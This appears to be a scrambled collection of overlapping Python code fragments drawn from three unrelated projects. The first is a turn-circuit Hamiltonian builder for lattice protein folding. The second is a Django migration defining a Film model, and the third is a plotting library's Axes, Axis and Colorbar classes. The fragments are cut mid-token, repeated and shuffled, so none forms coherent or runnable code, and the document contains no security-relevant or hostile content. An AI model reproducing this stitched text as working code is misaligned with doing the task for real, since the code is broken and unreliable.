(1-q_i)*q_j def circuit_xn(self, q_i, q_j): \"\"\"Implements a circuit", "* self.circuit_zp(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1), self.get(self.pointer(i+1)+2)) for i in range(self.naas-2)]) def overlap(self, i, j): \"\"\"Computes", "qxnor(sumstring['y+'][r], sumstring['y-'][r]) for r in range(maximum)]) return prefactor * \\ ( qxor(sumstring['x+'][0], sumstring['x-'][0])", "= list(reversed(sum_string)) self._sum_strings[(i, j, k)] = [sp.expand(sum_string[x]) for x in range(maximum)] return self._sum_strings[(i,", "self._sum_strings[(i, j, k)] def back_term(self): \"\"\"Ensures that the chain does not go back", "in range(1, p-1)]) \\ * qand([ qxor(sumstring['y+'][r-1], sumstring['y-'][r-1]) for r in range(1, p+1)])", "* q_j * q_k def circuit_xn(self, q_i, q_j, q_k): \"\"\"Implements a circuit that", "def circuit_yn(self, q_i, q_j, q_k): \"\"\"Implements a circuit that returns 1 if the", "chain does not go back on itself.\"\"\" return sum([ self.circuit_xp(self.get(self.pointer(i)), self.get(self.pointer(i)+1), self.get(self.pointer(i)+2)) *", "== 'y-': sum_string = [self.circuit_yn(self.get(self.pointer(t)), self.get(self.pointer(t)+1), self.get(self.pointer(t)+2)) for t in range(i, j)] elif", "a half-adder.\"\"\" return qand([q_i, q_j]), qxor(q_i, q_j) @property @abstractmethod def dim(self): pass class", "1 if the chain moves in the direction z+.\"\"\" return (1-q_i) * (1-q_j)", "chain moves in the direction x+.\"\"\" return (1-q_i)*q_j def circuit_xn(self, q_i, q_j): \"\"\"Implements", "k][r]) for r in range(maximum)]) for k in ['x', 'z']]) return prefactor *", "j)] elif k == 'y+': sum_string = [self.circuit_yp(self.get(self.pointer(t)), self.get(self.pointer(t)+1)) for t in range(i,", "self.circuit_xp(self.get(self.pointer(i)), self.get(self.pointer(i)+1)) * self.circuit_xn(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1)) + \\ self.circuit_xn(self.get(self.pointer(i)), self.get(self.pointer(i)+1)) * self.circuit_xp(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1)) +", "j, 'y+'), 'y-': self.sum_string(i, j, 'y-') } maximum = int(math.ceil(math.log2(abs(i-j)))) if i-j !=", "chain moves in the direction y+.\"\"\" return q_i * (1-q_j) * q_k def", "circuit_xp(self, q_i, q_j): \"\"\"Implements a circuit that returns 1 if the chain moves", "steric_term(self): \"\"\"Ensures that the chain does not overlap.\"\"\" return sum([ sum([ self.overlap(i, j)", "def back_term(self): \"\"\"Ensures that the chain does not go back on itself.\"\"\" return", "else [1] for h in iterator: if self.ss_fmat == 'babej': if counter[h] >", "does not overlap.\"\"\" return sum([ sum([ self.overlap(i, j) for j in range(i+1, self.naas)])", "return q_i * q_j * q_k def circuit_xn(self, q_i, q_j, q_k): \"\"\"Implements a", "* self.circuit_zn(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1), self.get(self.pointer(i+1)+2)) + \\ self.circuit_zn(self.get(self.pointer(i)), self.get(self.pointer(i)+1), self.get(self.pointer(i)+2)) * self.circuit_zp(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1), self.get(self.pointer(i+1)+2))", "3: self.expr += (self.naas+1)**2 * self.redun_term() self.expr += (self.naas+1) * self.steric_term() self.expr +=", "self.bit_list[k] def half_adder(self, q_i, q_j): \"\"\"Applies a half-adder.\"\"\" return qand([q_i, q_j]), qxor(q_i, q_j)", "string.\"\"\" if i > j: raise ValueError(\"i > j\") if (i, j, k)", "q_k): \"\"\"Implements a circuit that checks the nonsensical string 000.\"\"\" return (1-q_i) *", "that returns 1 if the chain moves in the direction z+.\"\"\" return (1-q_i)", "\\ self.circuit_xn(self.get(self.pointer(i)), self.get(self.pointer(i)+1), self.get(self.pointer(i)+2)) * self.circuit_xp(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1), self.get(self.pointer(i+1)+2)) + \\ self.circuit_yp(self.get(self.pointer(i)), self.get(self.pointer(i)+1), self.get(self.pointer(i)+2))", "r in range(maximum)]) for k in ['x', 'z']]) return prefactor * \\ (", "self.get(self.pointer(t)+1)) for t in range(i, j)] elif k == 'y+': sum_string = [self.circuit_yp(self.get(self.pointer(t)),", "or maximum < 2: return sp.numbers.Integer(0) sumstring = { 'x+': self.sum_string(i, j, 'x+'),", "(1-q_i)*(1-q_j) def sum_string(self, i, j, k): \"\"\"Computes the sum string.\"\"\" if i >", "1+i+2*j) return expr class TurnCircuitHamiltonian3D(CommonTurnCircuitHamiltonian): is_3D = True @property def dim(self): return 3", "maximum+1)]) for p in range(2, maximum+1)])) def a_y(self, i, j): sumstring = {", "self.get(self.pointer(i)+2)) * self.circuit_zp(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1), self.get(self.pointer(i+1)+2)) for i in range(self.naas-2)]) def overlap(self, i, j):", "p+1)]) \\ * qand([ qxnor(sumstring['y+'][r-1], sumstring['y-'][r-1]) for r in range(p+1, maximum+1)]) for p", "x-.\"\"\" return q_i*(1-q_j) def circuit_yp(self, q_i, q_j): \"\"\"Implements a circuit that returns 1", "qand([ qxnor(sumstring['z+'][r], sumstring['z-'][r]) for r in range(1, maximum)]) \\ + sum([ qxor(sumstring['z+'][p-2], sumstring['z+'][p-1])", "back on itself.\"\"\" return sum([ self.circuit_xp(self.get(self.pointer(i)), self.get(self.pointer(i)+1)) * self.circuit_xn(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1)) + \\ self.circuit_xn(self.get(self.pointer(i)),", "for p in range(2, maximum+1)])) def interaction_term_ij(self, i, j): return -1* self.int_mat[i, j]", "returns 1 if the chain moves in the direction z-.\"\"\" return (1-q_i) *", "+ \\ self.circuit_xn(self.get(self.pointer(i)), self.get(self.pointer(i)+1)) * self.circuit_xp(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1)) + \\ self.circuit_yp(self.get(self.pointer(i)), self.get(self.pointer(i)+1)) * self.circuit_yn(self.get(self.pointer(i+1)),", "k): \"\"\"Access the kth bit of the hamiltonian.\"\"\" return self.bit_list[k] def half_adder(self, q_i,", "def a_x(self, i, j): sumstring = { 'x+': self.sum_string(i, j, 'x+'), 'x-': self.sum_string(i,", "* self.circuit_xn(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1)) + \\ self.circuit_xn(self.get(self.pointer(i)), self.get(self.pointer(i)+1)) * self.circuit_xp(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1)) + \\ self.circuit_yp(self.get(self.pointer(i)),", "in range(i, j)] elif k == 'z-': sum_string = [self.circuit_zn(self.get(self.pointer(t)), self.get(self.pointer(t)+1), self.get(self.pointer(t)+2)) for", "residue bitstrings 000 and 011.\"\"\" return sum([ self.circuit_000(self.get(self.pointer(k)), self.get(self.pointer(k)+1), self.get(self.pointer(k)+2)) + \\ self.circuit_011(self.get(self.pointer(k)),", "\\ * qand([ qxnor(sumstring['x+'][r-1], sumstring['x+'][r]) for r in range(1, p-1)]) \\ * qand([", "half-adders sum_string = list(reversed(sum_string)) for t in chain(range(n_layers), reversed(range(n_layers-1))): if t % 2", "described by Babbush et al., 2012.\"\"\" self._proc_input(pepstring) self.ss_fmat = ss_fmat self.n_bits = self.dim", "t in range(i, j)] elif k == 'y-': sum_string = [self.circuit_yn(self.get(self.pointer(t)), self.get(self.pointer(t)+1)) for", "return sum([ self.circuit_000(self.get(self.pointer(k)), self.get(self.pointer(k)+1), self.get(self.pointer(k)+2)) + \\ self.circuit_011(self.get(self.pointer(k)), self.get(self.pointer(k)+1), self.get(self.pointer(k)+2)) for k in", "in range(p+1, maximum+1)]) for p in range(2, maximum+1)])) def a_y(self, i, j): sumstring", "\\ + sum([ qxor(sumstring['x+'][p-2], sumstring['x+'][p-1]) \\ * qand([ qxnor(sumstring['x+'][r-1], sumstring['x+'][r]) for r in", "sum_string = [self.circuit_xp(self.get(self.pointer(t)), self.get(self.pointer(t)+1)) for t in range(i, j)] elif k == 'x-':", "for p in range(2, maximum+1)])) def a_z(self, i, j): sumstring = { 'x+':", "qand([ qxnor(sumstring['z+'][r-1], sumstring['z-'][r-1]) for r in range(p+1, maximum+1)]) for p in range(2, maximum+1)]))", "* qand([ qxor(sumstring['y+'][r-1], sumstring['y-'][r-1]) for r in range(1, p+1)]) \\ * qand([ qxnor(sumstring['y+'][r-1],", "sumstring = { 'x+': self.sum_string(i, j, 'x+'), 'x-': self.sum_string(i, j, 'x-'), 'y+': self.sum_string(i,", "qxnor(sumstring['z+'][r-1], sumstring['z-'][r-1]) for r in range(p+1, maximum+1)]) for p in range(2, maximum+1)])) def", "\\ * qand([ qxnor(sumstring['x+'][r], sumstring['x-'][r]) for r in range(1, maximum)]) \\ + sum([", "turn.\"\"\" return 2*i def circuit_xp(self, q_i, q_j): \"\"\"Implements a circuit that returns 1", "j in range(i+1, self.naas)]) for i in range(self.naas)]) def a_x(self, i, j): sumstring", "math import numpy as np import sympy as sp import symengine as se", "redun_term(self): \"\"\"Implements the term that penalises meaningless residue bitstrings 000 and 011.\"\"\" return", "for k in ['x', 'y']]) return prefactor * \\ ( qxor(sumstring['z+'][0], sumstring['z-'][0]) \\", "self.circuit_yp(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1)) for i in range(self.naas-2)]) def overlap(self, i, j): \"\"\"Computes the overlap", "return -1* self.int_mat[i, j] * (self.a_x(i, j) + \\ self.a_y(i, j) + \\", "k)] if k == 'x+': sum_string = [self.circuit_xp(self.get(self.pointer(t)), self.get(self.pointer(t)+1)) for t in range(i,", "q_j * q_k def circuit_xn(self, q_i, q_j, q_k): \"\"\"Implements a circuit that returns", "import deepcopy from itertools import chain from functools import reduce from .qlogic import", "circuit that returns 1 if the chain moves in the direction x-.\"\"\" return", "for r in range(maximum)]) for k in ['y', 'z']]) return prefactor * \\", "000.\"\"\" return (1-q_i) * q_j * q_k def sum_string(self, i, j, k): \"\"\"Computes", "= True @property def dim(self): return 2 def pointer(self, i): \"\"\"Points to the", "* q_k def sum_string(self, i, j, k): \"\"\"Computes the sum string.\"\"\" if i", "self.get(self.pointer(t)+1), self.get(self.pointer(t)+2)) for t in range(i, j)] else: raise ValueError('k was {:s}'.format(k)) n_layers", "self.circuit_yn(self.get(self.pointer(i)), self.get(self.pointer(i)+1)) * self.circuit_yp(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1)) for i in range(self.naas-2)]) def overlap(self, i, j):", "dim(self): return 3 def pointer(self, i): \"\"\"Points to the start of the string" ]
[ "django.db.models.deletion class Migration(migrations.Migration): initial = True dependencies = [ migrations.swappable_dependency(settings.AUTH_USER_MODEL), ] operations =", "models.CharField(choices=[('unrated', 'Unrated'), ('1', '1'), ('2', '2'), ('3', '3'), ('4', '4'), ('5', '5'), ('6',", "('animated_film', 'Animated film'), ('animated_show', 'Animated show')], default='movie', max_length=50)), ('user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)), ],", "] operations = [ migrations.CreateModel( name='Film', fields=[ ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('film_name',", "('film_release_date', models.DateField(null=True)), ('film_genre', models.CharField(max_length=50)), ('film_rating', models.CharField(choices=[('unrated', 'Unrated'), ('1', '1'), ('2', '2'), ('3', '3'),", "film'), ('animated_show', 'Animated show')], default='movie', max_length=50)), ('user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)), ], ), ]", "class Migration(migrations.Migration): initial = True dependencies = [ migrations.swappable_dependency(settings.AUTH_USER_MODEL), ] operations = [", "models.CharField(max_length=100)), ('film_release_date', models.DateField(null=True)), ('film_genre', models.CharField(max_length=50)), ('film_rating', models.CharField(choices=[('unrated', 'Unrated'), ('1', '1'), ('2', '2'), ('3',", "migrations.swappable_dependency(settings.AUTH_USER_MODEL), ] operations = [ migrations.CreateModel( name='Film', fields=[ ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),", "('film_rating', models.CharField(choices=[('unrated', 'Unrated'), ('1', '1'), ('2', '2'), ('3', '3'), ('4', '4'), ('5', '5'),", "'8'), ('9', '9'), ('10', '10')], default='unrated', max_length=10)), ('film_type', models.CharField(choices=[('movie', 'Movie'), ('tv_show', 'TV Show'),", "# Generated by Django 3.2.4 on 2021-10-11 10:34 from django.conf import settings from", "migrations, models import django.db.models.deletion class Migration(migrations.Migration): initial = True dependencies = [ migrations.swappable_dependency(settings.AUTH_USER_MODEL),", "('8', '8'), ('9', '9'), ('10', '10')], default='unrated', max_length=10)), ('film_type', models.CharField(choices=[('movie', 'Movie'), ('tv_show', 'TV", "models.CharField(choices=[('movie', 'Movie'), ('tv_show', 'TV Show'), ('animated_film', 'Animated film'), ('animated_show', 'Animated show')], default='movie', max_length=50)),", "= True dependencies = [ migrations.swappable_dependency(settings.AUTH_USER_MODEL), ] operations = [ migrations.CreateModel( name='Film', fields=[", "models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('film_name', models.CharField(max_length=100)), ('film_release_date', models.DateField(null=True)), ('film_genre', models.CharField(max_length=50)), ('film_rating', models.CharField(choices=[('unrated', 'Unrated'),", "('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('film_name', models.CharField(max_length=100)), ('film_release_date', models.DateField(null=True)), ('film_genre', models.CharField(max_length=50)), ('film_rating', models.CharField(choices=[('unrated',", "('3', '3'), ('4', '4'), ('5', '5'), ('6', '6'), ('7', '7'), ('8', '8'), ('9',", "Django 3.2.4 on 2021-10-11 10:34 from django.conf import settings from django.db import migrations,", "'4'), ('5', '5'), ('6', '6'), ('7', '7'), ('8', '8'), ('9', '9'), ('10', '10')],", "name='Film', fields=[ ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('film_name', models.CharField(max_length=100)), ('film_release_date', models.DateField(null=True)), ('film_genre', models.CharField(max_length=50)),", "2021-10-11 10:34 from django.conf import settings from django.db import migrations, models import django.db.models.deletion", "'5'), ('6', '6'), ('7', '7'), ('8', '8'), ('9', '9'), ('10', '10')], default='unrated', max_length=10)),", "initial = True dependencies = [ migrations.swappable_dependency(settings.AUTH_USER_MODEL), ] operations = [ migrations.CreateModel( name='Film',", "django.conf import settings from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): initial", "models.DateField(null=True)), ('film_genre', models.CharField(max_length=50)), ('film_rating', models.CharField(choices=[('unrated', 'Unrated'), ('1', '1'), ('2', '2'), ('3', '3'), ('4',", "'Unrated'), ('1', '1'), ('2', '2'), ('3', '3'), ('4', '4'), ('5', '5'), ('6', '6'),", "migrations.CreateModel( name='Film', fields=[ ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('film_name', models.CharField(max_length=100)), ('film_release_date', models.DateField(null=True)), ('film_genre',", "'3'), ('4', '4'), ('5', '5'), ('6', '6'), ('7', '7'), ('8', '8'), ('9', '9'),", "on 2021-10-11 10:34 from django.conf import settings from django.db import migrations, models import", "Show'), ('animated_film', 'Animated film'), ('animated_show', 'Animated show')], default='movie', max_length=50)), ('user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),", "[ migrations.swappable_dependency(settings.AUTH_USER_MODEL), ] operations = [ migrations.CreateModel( name='Film', fields=[ ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False,", "serialize=False, verbose_name='ID')), ('film_name', models.CharField(max_length=100)), ('film_release_date', models.DateField(null=True)), ('film_genre', models.CharField(max_length=50)), ('film_rating', models.CharField(choices=[('unrated', 'Unrated'), ('1', '1'),", "('1', '1'), ('2', '2'), ('3', '3'), ('4', '4'), ('5', '5'), ('6', '6'), ('7',", "'6'), ('7', '7'), ('8', '8'), ('9', '9'), ('10', '10')], default='unrated', max_length=10)), ('film_type', models.CharField(choices=[('movie',", "'TV Show'), ('animated_film', 'Animated film'), ('animated_show', 'Animated show')], default='movie', max_length=50)), ('user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE,", "('5', '5'), ('6', '6'), ('7', '7'), ('8', '8'), ('9', '9'), ('10', '10')], default='unrated',", "('9', '9'), ('10', '10')], default='unrated', max_length=10)), ('film_type', models.CharField(choices=[('movie', 'Movie'), ('tv_show', 'TV Show'), ('animated_film',", "from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): initial = True dependencies", "3.2.4 on 2021-10-11 10:34 from django.conf import settings from django.db import migrations, models", "'10')], default='unrated', max_length=10)), ('film_type', models.CharField(choices=[('movie', 'Movie'), ('tv_show', 'TV Show'), ('animated_film', 'Animated film'), ('animated_show',", "operations = [ migrations.CreateModel( name='Film', fields=[ ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('film_name', models.CharField(max_length=100)),", "by Django 3.2.4 on 2021-10-11 10:34 from django.conf import settings from django.db import", "primary_key=True, serialize=False, verbose_name='ID')), ('film_name', models.CharField(max_length=100)), ('film_release_date', models.DateField(null=True)), ('film_genre', models.CharField(max_length=50)), ('film_rating', models.CharField(choices=[('unrated', 'Unrated'), ('1',", "'Animated film'), ('animated_show', 'Animated show')], default='movie', max_length=50)), ('user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)), ], ),", "('7', '7'), ('8', '8'), ('9', '9'), ('10', '10')], default='unrated', max_length=10)), ('film_type', models.CharField(choices=[('movie', 'Movie'),", "import migrations, models import django.db.models.deletion class Migration(migrations.Migration): initial = True dependencies = [", "'9'), ('10', '10')], default='unrated', max_length=10)), ('film_type', models.CharField(choices=[('movie', 'Movie'), ('tv_show', 'TV Show'), ('animated_film', 'Animated", "models.CharField(max_length=50)), ('film_rating', models.CharField(choices=[('unrated', 'Unrated'), ('1', '1'), ('2', '2'), ('3', '3'), ('4', '4'), ('5',", "import django.db.models.deletion class Migration(migrations.Migration): initial = True dependencies = [ migrations.swappable_dependency(settings.AUTH_USER_MODEL), ] operations", "10:34 from django.conf import settings from django.db import migrations, models import django.db.models.deletion class", "django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): initial = True dependencies =", "models import django.db.models.deletion class Migration(migrations.Migration): initial = True dependencies = [ migrations.swappable_dependency(settings.AUTH_USER_MODEL), ]", "import settings from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): initial =", "= [ migrations.CreateModel( name='Film', fields=[ ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('film_name', models.CharField(max_length=100)), ('film_release_date',", "Migration(migrations.Migration): initial = True dependencies = [ migrations.swappable_dependency(settings.AUTH_USER_MODEL), ] operations = [ migrations.CreateModel(", "('6', '6'), ('7', '7'), ('8', '8'), ('9', '9'), ('10', '10')], default='unrated', max_length=10)), ('film_type',", "'1'), ('2', '2'), ('3', '3'), ('4', '4'), ('5', '5'), ('6', '6'), ('7', '7'),", "[ migrations.CreateModel( name='Film', fields=[ ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('film_name', models.CharField(max_length=100)), ('film_release_date', models.DateField(null=True)),", "('2', '2'), ('3', '3'), ('4', '4'), ('5', '5'), ('6', '6'), ('7', '7'), ('8',", "fields=[ ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('film_name', models.CharField(max_length=100)), ('film_release_date', models.DateField(null=True)), ('film_genre', models.CharField(max_length=50)), ('film_rating',", "default='unrated', max_length=10)), ('film_type', models.CharField(choices=[('movie', 'Movie'), ('tv_show', 'TV Show'), ('animated_film', 'Animated film'), ('animated_show', 'Animated", "verbose_name='ID')), ('film_name', models.CharField(max_length=100)), ('film_release_date', models.DateField(null=True)), ('film_genre', models.CharField(max_length=50)), ('film_rating', models.CharField(choices=[('unrated', 'Unrated'), ('1', '1'), ('2',", "from django.conf import settings from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration):", "('10', '10')], default='unrated', max_length=10)), ('film_type', models.CharField(choices=[('movie', 'Movie'), ('tv_show', 'TV Show'), ('animated_film', 'Animated film'),", "max_length=10)), ('film_type', models.CharField(choices=[('movie', 'Movie'), ('tv_show', 'TV Show'), ('animated_film', 'Animated film'), ('animated_show', 'Animated show')],", "('4', '4'), ('5', '5'), ('6', '6'), ('7', '7'), ('8', '8'), ('9', '9'), ('10',", "True dependencies = [ migrations.swappable_dependency(settings.AUTH_USER_MODEL), ] operations = [ migrations.CreateModel( name='Film', fields=[ ('id',", "('film_genre', models.CharField(max_length=50)), ('film_rating', models.CharField(choices=[('unrated', 'Unrated'), ('1', '1'), ('2', '2'), ('3', '3'), ('4', '4'),", "'2'), ('3', '3'), ('4', '4'), ('5', '5'), ('6', '6'), ('7', '7'), ('8', '8'),", "Generated by Django 3.2.4 on 2021-10-11 10:34 from django.conf import settings from django.db", "'Movie'), ('tv_show', 'TV Show'), ('animated_film', 'Animated film'), ('animated_show', 'Animated show')], default='movie', max_length=50)), ('user',", "= [ migrations.swappable_dependency(settings.AUTH_USER_MODEL), ] operations = [ migrations.CreateModel( name='Film', fields=[ ('id', models.BigAutoField(auto_created=True, primary_key=True,", "('film_name', models.CharField(max_length=100)), ('film_release_date', models.DateField(null=True)), ('film_genre', models.CharField(max_length=50)), ('film_rating', models.CharField(choices=[('unrated', 'Unrated'), ('1', '1'), ('2', '2'),", "('tv_show', 'TV Show'), ('animated_film', 'Animated film'), ('animated_show', 'Animated show')], default='movie', max_length=50)), ('user', models.ForeignKey(null=True,", "dependencies = [ migrations.swappable_dependency(settings.AUTH_USER_MODEL), ] operations = [ migrations.CreateModel( name='Film', fields=[ ('id', models.BigAutoField(auto_created=True,", "settings from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): initial = True", "('film_type', models.CharField(choices=[('movie', 'Movie'), ('tv_show', 'TV Show'), ('animated_film', 'Animated film'), ('animated_show', 'Animated show')], default='movie',", "'7'), ('8', '8'), ('9', '9'), ('10', '10')], default='unrated', max_length=10)), ('film_type', models.CharField(choices=[('movie', 'Movie'), ('tv_show'," ]
[ "the axis and way to manipulate the axis appearance. \"\"\" @mark_backend_unsupported def enable_zooming(self,", "self.colorbar.finalize() del self.colorbar def add_line( self, id: str, orientation: str, position: float, bounds:", "\"\"\"Cursor on a plot.\"\"\" #: x_value = Float() #: y_value = Float() #:", "def add_colorbar(self): \"\"\"Add a colorbar to the axes.\"\"\" if self.colorbar: return self.colorbar =", "pass class ColorbarProxy(PlotElementProxy): \"\"\"Proxy for the colorbar attached to a colorplot.\"\"\" @mark_backend_unsupported def", "axis and way to manipulate the axis appearance. \"\"\" @mark_backend_unsupported def enable_zooming(self, bound:", "pass @mark_backend_unsupported def set_limits_with_breaks(self, limits): pass @mark_backend_unsupported def set_label(self, title: str, font: Mapping[str,", "and a way to prevent self recursion # FIXME Add convenience to connect", "to connect axes between them class Colorbar(PlotElement): \"\"\"Colorbar for a 2D plot.\"\"\" #:", "axis. limits = List(tuple) #: Label of the axis label = Str() #:", "the axes plots = Dict(str, BasePlot) #: Display a major grid major_grid_enabled =", "@mark_backend_unsupported def disable_major_grid(self): pass @mark_backend_unsupported def enable_minor_grid(self): pass @mark_backend_unsupported def disable_minor_grid(self): pass @mark_backend_unsupported", "def _resolve_figure(): from .figure import Figure return Figure class Axes(PlotElement): \"\"\"Axes of a", "for p in self.plots.values(): p.backend_name = self.backend_name p.initialize(resolver) #: Conserve a reference to", "def remove_line(self, id: str) -> None: pass class Axis(PlotElement): \"\"\"Axis of a plot.\"\"\"", "for lab, _ in missing]} do not \" \"exist. Existing axes are \"", "not self.proxy: raise RuntimeError(f\"Axes {self} does not have an active proxy.\") self.proxy.remove_plot(id, self.plots[id])", "matplotlib default) # --- Private API #: Reference to the backend resolver needed", "#: Reference to the parent axes. axes = ForwardTyped(lambda: Axes) #: Should that", "and the axes.\"\"\" super().initialize(resolver) for axis in (self.left_axis, self.bottom_axis, self.right_axis, self.top_axis): if not", "_resolve_figure(): from .figure import Figure return Figure class Axes(PlotElement): \"\"\"Axes of a plot\"\"\"", "to add more elements #: later on. self._resolver = resolver def finalize(self): \"\"\"Finalize", "used for the label label_font = Dict(str) #: Font used for the tick", "\"bottom\" if self.bottom_axis else \"top\", \"y\": \"left\" if self.left_axis else \"right\", } plot.axes_mapping", "from ..backends.resolver import BackendResolver from .base import BasePlot, PlotElement, PlotElementProxy, mark_backend_unsupported class AxisProxy(PlotElementProxy):", "def remove_colorbar(self): \"\"\"Remove the colorbar from the axes.\"\"\" self.colorbar.finalize() del self.colorbar def add_line(", "used for {[lab for lab, _ in missing]} do not \" \"exist. Existing", "the tick labels tick_labels_font = Dict(str) #: aspect_ratio = Int(20) class Cursor(PlotElement): \"\"\"Cursor", ") for pa in axes.values() ): unknown = [] missing = [] for", "# What axis are we linked to pass def remove_cursor(self, index: int): pass", "if missing: raise RuntimeError( f\"The axes used for {[lab for lab, _ in", "set_limits_with_breaks(self, limits): pass @mark_backend_unsupported def invert_axis(self, state: bool): pass @mark_backend_unsupported def set_label(self, title:", "super().__init__(**kwargs) if not self.bottom_axis or self.top_axis: self.bottom_axis = Axis(axes=self) if not self.left_axis or", "axes used for {[lab for lab, _ in unknown]} do not \" \"correspond", "from the axes.\"\"\" self.colorbar.finalize() del self.colorbar def add_line( self, id: str, orientation: str,", "def set_limits_with_breaks(self, limits): pass @mark_backend_unsupported def set_label(self, title: str, font: Mapping[str, Any]): pass", "Axis(PlotElement): \"\"\"Axis of a plot.\"\"\" #: Reference to the parent axes. axes =", "for p in self.plots.values(): p.finalize() for c in self.cursors: c.finalize() if self.colorbar: self.colorbar.finalize()", "@mark_backend_unsupported def set_limits_with_breaks(self, limits): pass @mark_backend_unsupported def set_label(self, title: str, font: Mapping[str, Any]):", "right_axis = Typed(Axis) top_axis = Typed(Axis) #: Colorbar associated with plot if any.", "different figures ie beyond # matplotlib default) # --- Private API #: Reference", "self.bottom_axis or self.top_axis: self.bottom_axis = Axis(axes=self) if not self.left_axis or self.right_axis: self.left_axis =", "pa in axes.items(): if pa not in (\"left\", \"bottom\", \"right\", \"top\"): unknown.append((lab, pa))", "def remove_cursor(self, index: int): pass def add_plot(self, plot) -> None: \"\"\"Add a plot", "def remove_cursor(self): pass @mark_backend_unsupported def enable_major_grid(self): pass @mark_backend_unsupported def disable_major_grid(self): pass @mark_backend_unsupported def", "we linked to pass def remove_cursor(self, index: int): pass def add_plot(self, plot) ->", "pass @mark_backend_unsupported def remove_line(self, id: str) -> None: pass class Axis(PlotElement): \"\"\"Axis of", "self.cursors: c.finalize() if self.colorbar: self.colorbar.finalize() for axis in (self.top_axis, self.right_axis, self.bottom_axis, self.left_axis): axis.finalize()", "provide way to draw into the axis and way to manipulate the axis", "top_axis = Typed(Axis) #: Colorbar associated with plot if any. colorbar = Typed(Colorbar)", "# SHOULD NOT be edited in place. legends = Dict(str, str) #: Projection", "#: axes in the axes_set. intercept = Float() # FIXME Add connections to", "p.backend_name = self.backend_name p.initialize(resolver) #: Conserve a reference to the resolver to be", "pa)) elif getattr(axes, f\"{pa}_axis\") is None: missing.append((lab, pa)) if missing: raise RuntimeError( f\"The", "font: Mapping[str, Any]): pass class CursorProxy(PlotElementProxy): \"\"\"Proxy for a cursor.\"\"\" pass class AxesProxy(PlotElementProxy):", "self.left_axis = Axis(axes=self) def initialize(self, resolver): \"\"\"Initialize the proxy of the object and", "set_tick_position(self, position: str): pass class ColorbarProxy(PlotElementProxy): \"\"\"Proxy for the colorbar attached to a", "cursors = ATuple(Cursor) #: Set of plots currently displayed in the axes plots", "disable_minor_grid(self): pass @mark_backend_unsupported def set_legend(self, legend: Mapping[str, str]): pass @mark_backend_unsupported def remove_plot(self, id):", "setting: bool): pass @mark_backend_unsupported def set_limits(self, limits): # Limited to axis with no", "plot.id in self.plots: raise RuntimeError(f\"A plot with {id} already exist in axes {self}\")", "str, font: Mapping[str, Any]): pass @mark_backend_unsupported def set_tick_labels(self, labels: Sequence[str], font: Mapping[str, Any]):", "@mark_backend_unsupported def add_cursor( self, axes=None ): # Need to specify to which axes", "return Figure class Axes(PlotElement): \"\"\"Axes of a plot\"\"\" #: Reference to the figure", "license. # # The full license is in the file LICENCE, distributed with", "Figure class Axes(PlotElement): \"\"\"Axes of a plot\"\"\" #: Reference to the figure holding", "= Axis(axes=self) if not self.left_axis or self.right_axis: self.left_axis = Axis(axes=self) def initialize(self, resolver):", "{id} does not exist in axes {self.axes},\" f\" known plots are {self.plots}\" )", "\"right\", \"top\") or getattr(self, f\"{pa}_axis\") is None ) for pa in axes.values() ):", "List, Str from atom.api import Tuple as ATuple from atom.api import Typed from", "import BasePlot, PlotElement, PlotElementProxy, mark_backend_unsupported class AxisProxy(PlotElementProxy): \"\"\"Proxy for a single axis. Handle:", "pass def add_plot(self, plot) -> None: \"\"\"Add a plot to the axes.\"\"\" if", "supposed to be used. if any( ( pa not in (\"left\", \"bottom\", \"right\",", "#: Axes composing this object. left_axis = Typed(Axis) bottom_axis = Typed(Axis) right_axis =", "to axis with no breaks pass @mark_backend_unsupported def set_limits_with_breaks(self, limits): pass @mark_backend_unsupported def", "pass def remove_line(self, id: str) -> None: pass # FIXME Need to define", "# FIXME Add convenience to connect axes between them class Colorbar(PlotElement): \"\"\"Colorbar for", "currently active on the graph cursors = ATuple(Cursor) #: Set of plots currently", "its ID.\"\"\" if id not in self.plots: raise KeyError( f\"Plot {id} does not", "in the axes plots = Dict(str, BasePlot) #: Display a major grid major_grid_enabled", "# Validate the axes supposed to be used. if any( ( pa not", "under the terms of the BSD license. # # The full license is", "{[lab for lab, _ in unknown]} do not \" \"correspond to any valid", "# The full license is in the file LICENCE, 